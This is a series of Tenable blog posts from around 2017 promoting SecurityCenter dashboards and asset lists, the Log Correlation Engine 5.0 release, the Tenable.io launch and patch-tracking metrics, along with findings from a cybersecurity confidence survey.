Tenable SecurityCenter® provides continuous network monitoring to identify vulnerabilities, reduce risk, and ensure compliance. When using active and agent based scanning, SecurityCenter can analyze each system and discover the operating system, installed applications, miscellaneous configuration settings, and the vulnerabilities associated with each risk factor. SecurityCenter also provides an easy to understand and maintain method of communicating the metrics associated with these identified risks and vulnerabilities. Assurance Report Cards, dashboards, and reports all help to communicate the metrics to different levels of information consumers. SecurityCenter can create simple to understand charts and graphs for executive level consumption, and at the same time provide the detail needed for the IT operations team.

When preparing presentations for executive boards, CISOs need a wide range of data sources. SecurityCenter has over 350 dashboards and 400 reports to assist with the collection of metrics and to answer a CEO’s question, “How secure are we?” For this blog post we have selected 5 SecurityCenter dashboards that address these metrics. These vulnerability metrics are often identified by security experts as foundational to a solid security program. (For more information about these metrics, see Using Security Metrics to Drive Action: Security Metrics That Tell a Story to the Board, an insightful ebook published by Mighty Guides, Inc. with Tenable.)

Time to Detect

Time to Detect is an interesting and vital metric to answer the question, “Are we secure?” This metric can lead to a false sense of security if the detection time is not highly scrutinized and verified using several methods. For example, an application can have a zero day vulnerability - a vulnerability that has not been identified by the vendor - for several years in some cases. Does not knowing about the vulnerability make your company more secure? The answer is no; not knowing about a vulnerability will not make you more secure. You cannot mitigate a risk unless you are aware of it, but you can harden systems, networks, and firewalls to lessen the likelihood of compromise. In the Executive Vulnerability Metrics dashboard, there are 4 matrices that correlate vulnerabilities from the date the vulnerability is published to the time the vulnerability is identified by SecurityCenter - the time a patch is available, and the time the risk is mitigated. These matrices provide you with numbers that executives need to understand and properly assess risk to the organization.

Time to Containment or Mitigation

Having the ability to report on how efficient your mitigation program is can be critical to communicating the effectiveness of a risk mitigation strategy. SecurityCenter contains a database solely for this purpose. During the scanning process, SecurityCenter compares the scan results of a host to data stored in the cumulative database. Any vulnerability that is not present in the latest scan is considered mitigated. During this correlation process, there are two dates that are recorded:

• Days to Mitigate = Tracks the number of days since a vulnerability was moved to the mitigated database
• Days Since Mitigation = Tracks the number of days since a vulnerability was mitigated

Using these two filters, you can easily gain an understanding of how your patch management and risk mitigation programs are functioning. Using the Days to Mitigate, you can determine the Patch Rate within your organization, which speaks directly to the Time to Containment. The Historic Patch Mitigation Status dashboard presents counts of mitigation and containment metrics. The data in this dashboard helps answer the question “How long was this vulnerability a known threat?” If your patch cycle is every 30 days, then your patch rate should always be less than 30 days. Use these metrics to show how efficient the patch program is working, or to show a need for more staff or additional resources.

Baseline Metrics

Another important question you may get asked is, “What is Normal?” When analyzing network traffic patterns, disk usage, or database storage, the base metrics can be very straightforward to calculate. However, when calculating the the base metric for Vulnerability Analysis, the baseline is much more suggestive and determines how much risk you would like to accept.

Some organizations set the policy for the baseline as not having any vulnerabilities over a certain CVSS score, while others use the difference between credentialed and non-credentialed scans. Whichever metric your organization chooses, make sure to have the metric clearly defined and achievable. Regardless of the metric, the Vulnerabilities by Plugin Family dashboard is a good place to start your analysis. This dashboard provides a breakdown per plugin family of all the vulnerabilities discovered. Each of the components provide a breakdown using Mitigated, Unmitigated, CVSS Score, Exploitable, and Patch Availability. Use this information to present a current risk assessment based on different categories and operating systems.

Patch Management Efficiency

Another common metric is the Patch Management Efficiency metric. By tracking Patch Management Efficiency, you can justify manpower, show mitigation actions, and track many common business metrics. Companies like Microsoft that report vulnerabilities on a regularly scheduled basis provide CISOs with a set of changes for planning purposes. However, other companies that release patches at random intervals make the reporting of metrics more difficult. Both methods have positive and negative effects, but you must be able to report the metric accurately and convey that the host risk is reduced. The Mitigated Patch Rates dashboard provides a trend analysis of vulnerabilities discovered over 3 months, and a breakdown of vulnerabilities based on operating systems and CVSS score.

System Hardening Metric

System hardening is a challenging effort to say the least. When hardened configurations are applied, certain applications will not work correctly; and yet the threat of not hardening creates high risk from zero day vulnerabilities. Thankfully, there are organizations such as the Center for Internet Security (CIS), National Institute of Standards and Technology (NIST), and others to assist with hardening standards. SecurityCenter has the ability to perform configuration audits on several systems and map the configuration settings to match standards. The Compliance Summary dashboard provides a simple view of how an organization is meeting the support standards.

Wrapping Up

Reporting metrics that are understandable to the business is a difficult and time-consuming task. SecurityCenter is a great place to start when communicating risk to executives. Using these 5 dashboards along with other more business-specific dashboards, your organization can be more secure and your executives will be better informed.

Do you want better insights into the systems you are scanning? One of the best ways to power up a SecurityCenter® analysis can come by tailoring asset lists. The assets can provide more understanding and productivity as you craft new lists of your inventory. For example, you can craft them by vendor, location, severity of vulnerability, software installed, or many other criteria. In this blog, I will highlight some unique lists formulated by such characteristics as new hosts, age of vulnerability, processor, reboot, unsupported software, sniffing, and vendor model number.

Dynamic and combination asset lists

In this how-to blog, I will discuss the two most powerful types of asset lists: dynamic and combination. With dynamic lists, you can make rules that search through repository information in SecurityCenter. The breadth and level of detail in the repositories can be surprising; you can see that in the examples below. These lists are called dynamic because as the repositories receive new information, SecurityCenter automatically updates the list.

The inner workings of dynamic asset lists come from the fields which are derived from the information in the repositories. Examples of those fields include Severity, Plugin Id, or Days Since Discovery and others. Some of the more unique searching can be implemented with operands like contains the pattern, POSIX regex, and Perl compatible regex. (See the Equipment-Specific asset list below.)

One of the least understood parts of assets lists is that when multiple rules are included, each rule generates a separate request. This makes the results a little looser than most people think. (See the Over 30 Day Exploitable Vulnerabilities asset list below.)

You can build combination asset lists out of existing asset lists with the operands AND, OR, and NOT. This enables you to quickly merge lists (like all systems in two data centers) or pick out from two lists (like only the Windows hosts in the internet facing portion of the network-DMZ.) Entering multiple asset lists has shortcuts (see the Sniffed but not Scanned asset list below).

Part 1: Favorite customized asset lists

I teach classes for Tenable almost every week. Last year, while teaching at the state of Oregon, I was quite impressed with some of the asset lists that Steven Ketchum had put together. Here are a few favorites and how to set them up.

New Hosts asset list

In many enterprises—like data centers—you need to detect when new equipment shows up on the network. The New Hosts dynamic asset list uses daily, lightweight Nessus® scans or Passive Vulnerability Scanner® sensors to identify the new hosts. The list combines two plugins (Plugin ID 19506: Nessus Scan Information, and Plugin ID 12: PVS Hosts) with the Vulnerability Discovered filter.

You can also use this logic to trigger an alert which sends a report and performs a vulnerability scan of the new devices.

Over 30 Day Exploitable Vulnerabilities asset list

The Over 30 Day Exploitable Vulnerabilities asset list identifies hosts with the most urgent vulnerabilities that are in need of patching. The thirty day filter picks up hosts that are not fixed by the monthly patch cycle, which helps you find gaps in your patching processes. Second, the list filters to show the more urgent vulnerabilities—those of higher severity on the CVSS scale and which have publicly known exploits. This asset list needs a shorter name though; how about OTDEV?

Advanced tip: Since each rule will be a separate search, the results can be a little broader than intended. You can achieve tighter logic with a combination asset list built on these three rules.

Retire Hosts asset list

With the Retire Hosts asset list, you can sort out your server and workstation inventory. For example, pick out your older servers which have x86 (32-bit) processors (as compared to 64 bit in newer systems). Then, target the older boxes in a hardware retirement program.

Unsupported Adobe asset list

The Unsupported Adobe asset list works with workstations and servers to identify hosts with outdated or unsupported Adobe Acrobat and Reader software. Cleaning up Adobe removes a well-known threat vector. The list also helps you provided the executive team with accurate counts for budgeting software replacement.

Tenable also provides an asset list template called Unsupported Software that identifies deprecated software from many vendors and not just Adobe. The following screenshot shows Microsoft, Java, VMWare, Flash and others.

Systems Not Recently Rebooted asset list

Nessus scans can detect when a system last rebooted. One example of where this helps is with patching Windows systems. For example, some Windows patches do not take effect until the system reboots. And sometimes the reboot doesn’t occur. This asset list helps you find systems that were patched but still vulnerable.

Sniffed But Not Scanned asset list

Does your Passive Vulnerability Scanner see hosts in your network that your scans are missing? The Sniffed But Not Scanned list helps verify inventory and find overlooked systems. This is a combination list built from two templates which have already been added to SecurityCenter.

Tip: The Combination field, where you enter the asset lists, is interactive. For example:

1. Type the letters “pa” and SecurityCenter will filter the existing asset lists.
2. Position the cursor on Systems Discovered Passively, press the Enter key and then the spacebar.
3. Choose the operand AND by pressing the Enter key followed by the spacebar.
4. Press the Enter key to select NOT, then tap the spacebar once.
5. Type “sc”, move the highlight, and press Enter to select Systems that have been Scanned.
6. Click Submit to save the new list.

With a little practice, this interface helps you build combination asset lists much faster.

Equipment-Specific asset list

You can find specific types of equipment with Plugin ID 24270: Computer Manufacturer Information. With some regex filtering, you can search individual manufacturers and models. This plugin even reports the computer’s serial number.

Note: When possible, include an asset list to limit the scope of the search. Plugin text searches are the most expensive with respect to CPU time.

Part 2: Favorite asset lists from templates

The following asset lists are already predefined on your systems as templates. Many customers find these very helpful:

• Windows Hosts, Linux Hosts: Commonly used for setting up groups. Also helpful in adding Credential Scan dashboards (Windows, Linux, and Cisco.)

• Systems That Have Been Scanned: An essential list in working with inventory. How does this number compare with your current license count?

• Systems With Software Inventory: This list shows which hosts have been scanned with full access. How big a difference do you find between this list and the previous list (scanned hosts)?

• Bad Credentials: Which hosts had access issues during scans? Find them in the Credentialed dashboards, or set up an alert.

• Anti-virus Current: Performs three checks: 1) that anti-virus is installed, 2)running, and 3) has the latest signatures—which verify a critical element of endpoint defenses. In a combination asset list, you can combine Systems That Have Been Scanned AND NOT Anti-Virus Current. This helps find systems with anti-virus problems that are ripe for compromise.

Part 3: Which hosts?

You may want to know which hosts are being referenced by an asset list. You’ll have to dig in to find that information. Start on the Assets page. For the asset list in question, click on the gear icon on the far right. Select View. Then in the Viewable IPs section, find the repository and click on the triangle. The host list appears.

Suggestions

SecurityCenter doesn’t only have vulnerability information. You can build asset lists with other characteristics such as processor architecture, software status, and equipment model to meet business needs in managing your inventory. Lists can combine exploit information, risk severity, and vulnerability age to help you discover which boxes to patch first. You can also datamine forensics like reboot time to debug patching problems.

Try these assets lists in your SecurityCenter and let us know what your favorite asset lists are. Which asset lists have been most helpful to you? Do you have a suggestion for an asset list template? Head on over to The Tenable Community to share your ideas.

Thanks to Steve Ketchum, Oregon Department of Corrections, for his asset list suggestions, and contributions to this blog.

Recently, Tenable Network Security, with research conducted by CyberEdge Group, announced some surprising results from their annual 2017 Tenable Network Security Global Cybersecurity Assurance Report Card. Tenable surveyed 700 security practitioners from nine countries and seven industry verticals to assess the overall confidence levels of information security professionals in detecting and mitigating organizational cyber risk. The biggest takeaway from the report is the overall confidence levels score of 70% (a C- grade), a drop of six points from the year before, reflecting the frustration IT security professionals are facing from the challenges of assessing and mitigating cyber risks across a constantly evolving threat landscape.

Going from impact to solution

Despite the feeling that no amount of defense may ever fully stem the rising tide, moving back into a realm of cybersecurity confidence is possible for most organizations. The key is to bridge the gap between common cybersecurity maturity models and organizational development concepts like Stage Theory.

Stage Theory

Stemming from the health and education industry sectors, Stage Theory is the idea that organizations pass through a series of stages as they change. The integration and growth of cybersecurity within organizations must become part of that evolution. According to Stage Theory, adoption of an innovation follows four steps, and strategies for promoting changes can be matched to points in that process.

The four steps within Stage Theory are:

1. Develop an awareness of a problem and plan possible solution innovations.
2. Make a decision to adopt an innovation.
3. Implement the innovation, which includes redefining it, and modifying organizational structures to accommodate it.
4. Finally, fully institutionalize the innovation, making it part of the organization's ongoing activities.

Cybersecurity Capability Maturity Model

Cybersecurity maturity models, on the other hand, are a little more tactical and granular than organizational theories. The Cybersecurity Capability Maturity Model (CCMM) provides an introduction to the key activities organizations must implement within their IT security program from the perspective of three main areas: process and analytics, integrated governance, and enabling technology. It also includes three levels of maturity for each activity: limited, progressing or optimizing.

Although the CCMM provides valuable information, the actual execution of this model takes excessive and ubiquitous, top-down, executive sponsorship and support as well as an organization willing to commit to the leg work of combining the organizational theory with maturity modeling.

Committing to this approach translates to pairing different leaders or "change agents" within the organization who assume leading roles during different stages with the establishment and execution of cybersecurity processes, procedures and technologies. It also requires that leaders understand that the strategies their organization uses depends on their stage of change, and whether the nature of the social environment surrounding cybersecurity is supportive or obstructive.

Bridging the gap between security teams and business leaders

The result of properly committing to this approach can change an organization from a philosophy of cybersecurity being something companies begrudgingly do, to cybersecurity becoming part of the culture. This marriage of practices can also move IT security groups out of a relaxed, ad-hoc or subservient role and into a centralized and universal function, much like marketing, human resources, operations or finance is today. This approach can also be valuable in positioning CISOs with the opportunity to report directly to the CEO, as opposed to a CISO reporting to one of the CTOs, who in turn reports to a CIO under the COO.

Cybersecurity must become part of the culture

Finally, with this shift in understanding, organizations can move from elementary, disparate or poorly implemented technologies to an enterprise IT security technology architecture capable of producing actionable intelligence, real-time analysis, predictive modeling and stronger cybersecurity confidence. Any organization that does this will find their confidence rising well above C level in the next Tenable Network Security Global Cybersecurity Assurance Report Card, and have the skills to back up their newfound confidence.

The growing complexity of IT enterprises and the cyberthreats facing them are eroding governments’ confidence in their ability to assess and mitigate cybersecurity risk, according to the latest Global Cybersecurity Assurance Report Card. The overall score for governments across nine countries dropped three percentage points from 2016, to 63 percent, putting government last among the seven sectors surveyed. The key to boosting confidence is the ability to see infrastructure and monitor activity.

The annual report card, created by Tenable with research partner CyberEdge Group, does not measure actual security status. It assesses the confidence of information security professionals in their ability to protect their organizations. So a low score does not necessarily mean poor security. But it does show that government security professionals are acutely aware of the growing challenges they face.

Surprisingly, money shortages rank low on the list of security concerns. The real hurdles are taming the complexity of the environment and gaining visibility into the network.

The nuts and bolts

The report card is based on online surveys of 700 IT security professionals from 19 business sectors and governments in nine countries. The United States accounted for about 39 percent of respondents. Government accounted for a little more than five percent of those surveyed.

The study assesses confidence in two broad areas: Ability to assess risks within the enterprise and security assurance—an organization’s ability to mitigate threats based on executive and board-level commitment. Overall confidence in Security Assurance dropped from 70 percent in 2016 to 67 percent, and the Risk Assessment score dropped from 63 percent to 59 percent. Scores were down in just about every category for every sector.

The reason is the increasing complexity and decentralization of the IT environment and the complexity of the threats facing it. “The days of a well-defined network perimeter that can be secured and defended are long over,” the study concludes, and traditional security tools no longer are sufficient.

Governments’ strengths and weaknesses

Governments showed the lowest level of confidence in their cybersecurity among the sectors measured. But the results showed strengths as well as weaknesses.

Strengths

1. Measuring security effectiveness (B-)
2. Viewing network risks continuously (C+)
3. Conveying risks to executives and board members (C-)

Weaknesses

1. Aggregating risk intelligence (F)
2. Assessing cloud environments (F)
3. Assessing DevOps environments (F)

What’s the problem?

When respondents were asked to rate the challenges they face, lack of budget came out near the bottom of the list. The number one challenge is the “overwhelming cyber threat environment.” This was followed by security awareness among employees and a lack of network visibility caused by the proliferation of personal devices in the workplace and shadow IT.

I am more familiar with the U.S. government than other governments around the world, but I suspect that the cybersecurity challenges they face are similar. It is not so much a lack of money hindering government security (although that is always a problem) as it is a cumbersome budget process that slows IT refresh cycles, swells legacy infrastructure, and delays acquisition of security technology and manpower.

The result is a lack of visibility into the infrastructure and an inability to monitor activity, which makes it difficult to understand and secure the IT environment.

Boosting confidence

Despite problems, there are signs of improvement. The U.S. government is moving away from prescriptive, process-based security toward results-oriented programs. This is reflected in the shift from periodic assessment of static controls to a focus on continuous monitoring and risk management, as illustrated by the Continuous Diagnostics and Mitigation program.

This program provides the tools to tame the IT environment by creating visibility into agency networks, allowing them to discover resources and monitor, analyze and understand activity. Risks can then be identified, prioritized and mitigated. The ability to see, understand and control the network should give cybersecurity professionals greater confidence in their ability to do their jobs.

More information

You can get the detailed results of the survey in the full 2017 Global Cybersecurity Assurance Report Card, and compare it with results from the 2016 report card. Or listen to an on-demand webinar from Tenable.

Tenable is pleased to announce a major update to the Log Correlation Engine® (LCE®), making it easier to scale horizontally to meet growing organizational demands on performance and redundancy. Additionally, LCE 5.0.0 greatly expands language support for log data. This release will be available on January 30th, 2017.

Scalability and language support with Elasticsearch integration

The biggest update to the Log Correlation Engine in version 5.0.0 is the replacement of our proprietary database format with Elasticsearch. Elasticsearch is a document-store database that wraps Apache Lucene, providing horizontal scaling, built-in indexing, a REST API, and a comprehensive query language. Users unfamiliar with Elasticsearch need not worry - LCE handles setup, schema, and disk usage. Users familiar with Elasticsearch will immediately see the benefits:

• Horizontal scalability for additional performance and redundancy
• Integration with other Elasticsearch utilities such as Kibana for faster or more familiar log search, visualizations, and dashboards
• Language support for Chinese, Japanese, Korean and other characters for storage, index, and query of log data

Custom actions and real-time alerting with the Event Rule Editor

The Event Rules are one of the most powerful features in LCE, giving users the ability to take action and trigger alerts in real time. LCE 5.0.0 now makes the Event Rules much easier to create and maintain. The new editor in the UI guides users through all of the possible filters and actions available.

Enhanced language support with Windows Agent 5.0.0

Tenable will also introduce the LCE 5.0.0 Windows Agent, to coincide with the LCE 5.0.0 Server. The new agent adds the ability to monitor text files and NT event logs with Unicode log data, allowing users to send non-English logs from the LCE agent to the LCE server intact.

This update also greatly eases installation and configuration overhead for administrators by removing some installation requirements and adding full support for DHCP.

For users who need to pare down the data they send from the agent to the server, we’ve also added native NT event log filtering; just specify the event source and event ID to ignore in the agent policy, and you’ll save network bandwidth and CPU while reducing unnecessary log data in the LCE Server.

Improved agent policy management

Policy management gets faster and easier with LCE 5.0.0. Power users who create their own custom policies can now quickly see only those custom policies with the Hide Default button.

Some aesthetic updates were also made to the Policy screen - all of the actions are now exposed by clicking the Modify icon to the right of the policy name. The layout was also modified to ensure constant height rows for easier readability.

Downloading LCE

You can download LCE 5.0.0 and the LCE Windows Agent 5.0.0 from the Tenable Support Portal on January 30, 2017.

Elasticsearch is a trademark of Elasticsearch BV.
Apache, and Apache Lucene are trademarks of the Apache Software Foundation.

The vulnerability management industry is at a crossroads: solve long-standing problems and equip security teams for the future, or become obsolete.

As more organizations adopt cloud, mobile, and DevOps as core business enablers, the fundamental concept of an asset changes. This radically impacts how security teams interact with their peers and do their jobs. Even the ownership of assets changes with the rise of DevOps, as security teams must now work with developers, not just IT and network administrators. New thinking is required to deliver a modern approach to vulnerability management (VM) that solves these challenges without penalizing customers for using new technologies like cloud and containers.

Introducing Tenable.io

Tenable has embraced the challenge of transforming vulnerability management. Today we are proud to introduce Tenable.io™, the first vulnerability management platform built for today’s dynamic assets. Using our renowned Nessus® technology, Tenable.io delivers a fresh, asset-based approach that accurately tracks resources and prioritizes vulnerabilities, while accommodating dynamic assets like cloud and containers.

Tenable.io delivers a fresh, asset-based approach

The Tenable.io platform includes state-of-the-art applications for specific business needs, supported by horizontal capabilities like data collection and integration. These applications include not only Tenable.io Vulnerability Management, but also two new products that we are excited to announce: Tenable.io Container Security and Tenable.io Web Application Scanning.

Reorienting VM around a true view of assets

With the rise of transient and short-lived assets – laptops, mobile devices, cloud instances and now containers – Tenable has redefined vulnerability management around true asset identities, rather than IP addresses. This approach permeates the entire Tenable.io experience – from how it tracks vulnerabilities to how you license the product.

Tenable has redefined vulnerability management around true asset identities, rather than IP addresses

We addressed the asset challenge through an advanced asset fingerprinting algorithm. Think of it as facial recognition software for IT – no matter where assets come from and go to, Tenable.io sees their true identity. This allows security teams to have a fact-based dialogue with their peers in IT, networking and development about the organization’s overall security posture and what to remediate.

Customer-friendly licensing

Given these shifts in how organizations are managing assets and vulnerabilities, conventional licensing approaches are ill-suited to the modern environment. In their place, we are pleased to introduce Elastic Asset Licensing.

With Elastic Asset Licensing, each asset consumes just a single license unit

This industry-first model enables you to accurately license all your assets. Each asset consumes just a single license unit, even those with multiple IP addresses like laptops, mobile devices and cloud instances. This elastic model also allows product usage to continue when license counts are temporarily exceeded, and automatically recovers licenses for rarely scanned assets or one-time bursts. If you’ve ever had to “hoard” IP addresses with another VM solution, your frustration is over.

Moreover, we don’t nickel-and-dime customers the way some cloud VM vendors do. You pay only for the business applications you use and nothing more. All of the rich platform capabilities are included at no extra cost – including our popular Nessus sensors. You receive full and unfettered use of an unlimited number of internal and external scanners, agents and other data collection components.

Expanding vulnerability management to containers

Tenable.io Container Security, based on our recent acquisition of FlawCheck, continuously assesses container images for vulnerabilities, malware and enterprise policy compliance. By bringing security into the container build process up-front through integration with CI/CD systems (continuous integration/continuous deployment), you can gain visibility into the hidden risks in containers and remediate them before they reach production – all without slowing innovation cycles. We are now conducting early customer engagements with Tenable.io Container Security and plan to release it in April.

Web application security for your custom apps

We are also delighted to introduce Tenable.io Web Application Scanning. This offering provides comprehensive vulnerability scanning for modern web applications. Its accurate vulnerability coverage minimizes false positives and negatives, ensuring security teams understand the true risks in their web applications. And it does so in an automated and affordable way so you can cover all of your web apps. A customer beta program begins in March; if you’d like to participate, please contact us.

Openness and integration

It’s more critical than ever to have one place for all vulnerability data, no matter where it comes from. Solutions that only accept and manage their own data are doing a disservice to customers who need complete visibility.

It’s more critical than ever to have one place for all vulnerability data, no matter where it comes from

That’s why Tenable.io includes pre-built integrations with complementary systems like password vault, patch management and mobile device management (MDM) solutions. We are partnering with a wide range of vendors, many of whom are highlighted on our Works with Tenable.io page. Tenable.io also offers a well-documented API and easy to use software development kit (SDK), to enable additional integrations that help your security program leverage the full value of vulnerability data.

Looking ahead: the TVM journey

The introduction of Tenable.io is a major step on the journey toward answering some of the toughest questions in security: How secure am I? Is my security posture improving? What are the vulnerabilities and threats I should focus on?

Addressing them requires moving beyond conventional VM to provide deeper context and insight – by capturing more types of data (on assets, vulnerabilities and threats) from more vendors (including other VM vendors) in more ways (including pre-deployment and in production). This is exactly what Tenable.io is designed to do.

Gartner predicts that a new market called Threat and Vulnerability Management (TVM) – part of a broader market of Security Operations, Analytics and Reporting (SOAR) solutions – will develop to meet these needs. Gartner notes that TVM will deliver improved vulnerability management via both enhanced workflow and better prioritization through the use of threat intelligence and business context.

Our vision for the future of VM will deliver on TVM and more. This is an ambitious goal, and one Tenable is uniquely positioned to achieve.

TVM will deliver improved vulnerability management via both enhanced workflow and better prioritization through the use of threat intelligence and business context

More information

We invite you to join us on the journey. To experience Tenable.io today, please register to try the product, or join us for a product introduction webcast on February 28 in the Americas, with subsequent dates in other regions.

You can also learn more in our Tenable.io Frequently Asked Questions, covering Nessus Cloud, SecurityCenter®, pricing/licensing and more.

This week, Tenable made an exciting announcement about Tenable.io™, our new, modern vulnerability management platform built for today’s elastic assets. The Tenable.io platform will include state-of-the-art applications for specific business needs, the first of which is Tenable.io Vulnerability Management. In the near future, we’ll release additional applications for container security, web application scanning, and more.

For Nessus® Cloud customers, this first application is important because Nessus Cloud has evolved into Tenable.io Vulnerability Management.

Tenable.io Vulnerability Management will be familiar to anyone who has used or seen Nessus Cloud in the past. All the capabilities that were in Nessus Cloud are now a part of Tenable.io Vulnerability Management, including:

• Running vulnerability assessments for software flaws, configuration issues and malware detection using Nessus scanners and/or agents to reduce your attack surface
• Sharing scan resources, such as scanners, policies, and results for more efficient use of Tenable.io Vulnerability Management
• Integrating with complementary solutions like credential management, mobile device management, and patch management systems

Along with the previous Nessus Cloud features, Tenable.io Vulnerability Management also offers new capabilities that will help security professionals solve some of the very tough vulnerablity management challenges that come up in today’s dynamic IT environments.

Asset tracking delivers reliable results

Historically, vulnerability management solutions have tracked vulnerabilities by IP address. In recent years, IP-based vulnerability tracking has become more of a problem because many assets today have multiple IP addresses. Or for elastic assets like cloud instances, the IP address is often irrelevant. In situations like these, traditional vulnerability management solutions – relying solely on IP addresses – will simply provide inaccurate results.

Tenable.io Vulnerability Management offers a highly accurate way to track assets and vulnerabilities on those assets. It employs an advanced asset identification algorithm that uses an extensive set of attributes such as Tenable ID, NetBIOS name, MAC address, and many others to accurately track assets, changes to assets, and vulnerabilities on those assets.

Asset tracking enables Tenable.io to deliver the most accurate count and state information about vulnerabilities. There’s no duplicate counting of vulnerabilities on assets that have multiple IP addresses or mis-counting on assets that can have short-lived IP addresses like cloud instances. With this greater visibility and insight, security professionals are armed to make better decisions about where to focus resources and priorities to best protect their environments.

Customer friendly elastic asset licensing

Building on the foundation of asset tracking, Tenable.io Vulnerability Management customers also benefit from elastic asset licensing – the industry’s only licensing approach based on assets instead of IP addresses. Other vulnerability management solutions today follow rigid IP-based licensing, and for most organizations this results in increased cost, as IP counts can be challenging to gather accurately. Tenable.io follows a flexible and customer-friendly elastic asset licensing model, enabling users to monitor and adjust license consumption and then true-up when necessary, while continuing to use the product. Tenable.io automatically reclaims licenses from assets not scanned for 90 days – without deleting the data.

Dashboards and reports

To make it easier for security professionals to get insight into vulnerability data, there are a number of new dashboards and reports in Tenable.io Vulnerability Management. For example, there’s a new dashboard that specifically identifies those vulnerabilities that are exploitable by malware, which for many organizations will sit higher on the remediation list than others. The example below shows a dashboard that highlights patching status, which can be helpful for organizations that have goals like “fix all high priority vulnerabilities within 30 days.”

Next steps

This initial introduction of Tenable.io and Tenable.io Vulnerability Management is just the start. I look forward to sharing more new capabilities throughout 2017 and beyond.

If you have been using Nessus Cloud, the evolution to Tenable.io Vulnerability Management is seamless and requires no action on your part. When you log in, you’ll see the new name, and more importantly, new capabilities available to you.

If you’re new to Tenable.io Vulnerability Management, we’d love to have you learn more or take the application for a test drive. Here are a few resources that will help get you started:

• Visit the new Tenable.io area of our website
• Start a 60-day test drive of Tenable.io Vulnerability Management
• Register for our Introduction to Tenable.io webcast on February 28, 2017

The IT Operations teams in most organizations run in monthly cycles from “Patch Tuesday” to “Patch Tuesday.” The cycle never seems to end, and in many cases the vulnerabilities from one cycle bleed into the next, and this insurmountable problem seems to grow at an exponential rate. This continuous cycle often leads operational managers to make difficult choices – and in some cases – uncomfortable meetings, where they try to explain the presence of vulnerabilities. The Vulnerability Management (VM) application in Tenable.io enables operations managers to easily see how progress is made toward patch deployment goals.

Outstanding patch statistics

When reporting to management about the status of patch deployments, you always benefit from being able to quantify the current status in easily explainable terms. The Outstanding Patch Tracking dashboard provides easy to understand metrics that can be communicated to anyone in the organization. The top two components use the plugin (66334) Patch Report to show the status of how many systems are missing patches by the patch count and by the operating system. When reviewing the series by patch count, you can get an overall understanding of how effective patch management is, meaning if your systems have more than 90 patches missing, then your organization is not applying patches in an effective manner. On the other hand, if you only have systems with missing patches between 0 - 30 patches, you would be within a 30 patch cycle. The adjacent bar chart provides a list of hosts per operating system, which have been reviewed for missing patches. The Patch Report plugin is only triggered on a credentialed scan, so this chart also gives you an idea if all your systems are being scanned with valid credentials.

Microsoft Security Bulletins

After gaining a good understanding of the metrics, you must be able to communicate the risk and how vulnerable systems are by the outstanding patches. The Tracking Microsoft Security Bulletins - Current Missing Patches component displays the total count of missing patches related to Microsoft Security Bulletins. The security bulletins are named by the year and the order in which a bulletin was released. For example MS17-001 was Microsoft’s first security bulletin released in 2017 (Plugin ID: 96390 Plugin Name: MS17-001: Security Update for Microsoft Edge). This example illustrates the effectiveness of your patch management program. By combining several Microsoft Bulletin prefixes together, you can easily track the year the vulnerability was patched. An effective patch management system will not have patches in years prior to the current year.

This matrix includes six columns; the first provides a count of affected systems and the middle four columns provide a count based on the respective severity levels. The final column provides a count of the vulnerabilities which are exploitable. The color for this final column will change based on the percentage thresholds, the colors are: >=90 Red, >= 75 Orange, >= 50 Yellow, >= 25 Green, >= 1 Blue, Default Blue. This change in colors helps you to understand the level of risk: the colors closer to red indicate a greater risk.

Missing patches by plugin family

While reporting on Microsoft vulnerabilities is good, there are other operating systems you should be concerned with. The Remediations Tracking - Current Missing Patches component tracks vulnerabilities based on plugin families. Tenable.io is capable of analyzing many types of software and hardware. As a result, there are many plugin families covering different types of software and hardware grouped by a common theme, such as Debian Local Security Checks. There are currently over 60 plugin families supported by Tenable.io. The plugins within each family detect and evaluate information based on different criteria for each operating system. For example, for vulnerabilities found in Apache, there could be several plugins across many plugin families. Taking this approach helps you easily communicate the risk exposure by operating systems other than Microsoft.

This matrix uses a similar approach as the previous matrix, by providing a count of affected systems; the middle four columns provide a count based on the respective severity levels, and the last column shows exploitable percentages. However, in this matrix, the exploitable percentage remains purple regardless of the percentage value.

Outstanding patch analytics

As a practitioner and manager, I use the data in the Outstanding Patch Tracking dashboard on a daily basis. Monitoring the different views helps to prepare for conversations with my team and management. When communicating with my team and IT operations, this information helps to communicate risk and where remediation efforts are most needed. Additionally, I can have open discussions about problems in the vulnerability collection process. For example, when reviewing the bar chart, I can talk with the operations team about operating systems that I know are present on the network, but seem to be missing from the dashboard; or we can discuss quantities of each of the operating systems as needed.

Another interesting thing happened recently in a meeting with my team: the bar chart indicated that there were both “Windows 7 Professional” and “Windows 7 Professional N”. The “N” version of Windows 7 is a more international version of Windows, and it is often found in countries that are part of the European Economic Area, Croatia, and Switzerland. The OS allows for users to choose their own media player and software required to manage and play CDs, DVDs, and other digital media files. From this conversation, we started to have a larger conversation about where these systems came from if they should be present within our environment.

When discussing risk with the upper echelons of management and the security operations team, this dashboard provides me the current status of vulnerability data. With this information, I am able to speak about risk incurred from delaying patch deployments, and can provide insight on the exploitability if our organization were attacked. These numbers also provide foundational information needed to calculate projected costs per vulnerability if compromised. These types of analyses help executives understand the risk to the organization and may help to fund expensive mitigation strategies.

Wrapping up

As you work to address your risk mitigation tasks and track progress, the Tenable.io Outstanding Patch Tracking dashboard provides key analytics. Whether you are communicating up the chain, to peers, or to your team, this dashboard provides a thorough look at your outstanding risk.

Interesting in learning more about Tenable.io?

• Visit the Tenable.io area of our website
• Join our Introduction to Tenable.io webinar on February 28th
• Start a Tenable.io Vulnerability Management trial

Two years ago, the message coming out of the RSA Conference was that the security industry had failed; new products kept emerging, yet breaches were still on the rise. Today, we still hear about daily security attacks. Organizations embrace new technologies to remain competitive, and security practitioners struggle to keep pace and preserve the enterprise from painful compromise. If you think the tech community hasn’t done a great job of understanding exposures and managing risk in traditional enterprise environments, things get a lot more complex with the rush to cloud, embracing the DevOps revolution, containers and other technologies that increase capabilities but that turn traditional infrastructure on its head. Simply put, enterprise technology risk is getting more difficult to assess and manage effectively.

Cybersecurity in the spotlight in 2017

As enterprise use of technology is rapidly evolving, security vendors must also evolve or become obsolete. The importance of cybersecurity is clear in every organization - not just to security professionals, but to CEOs, boards of directors, government agencies and customers. Security teams are starting to think about security more strategically. Senior executives couldn’t care less about the better mouse traps our industry is so fond of developing and marketing with great fanfare. The questions CISOs and senior executives want to know are quite foundational: “How exposed is our organization?” “How much risk are we facing?” and “How does that exposure and risk profile change as we make changes to our IT systems and business model?”

Vulnerability and risk management are going to look very different this year

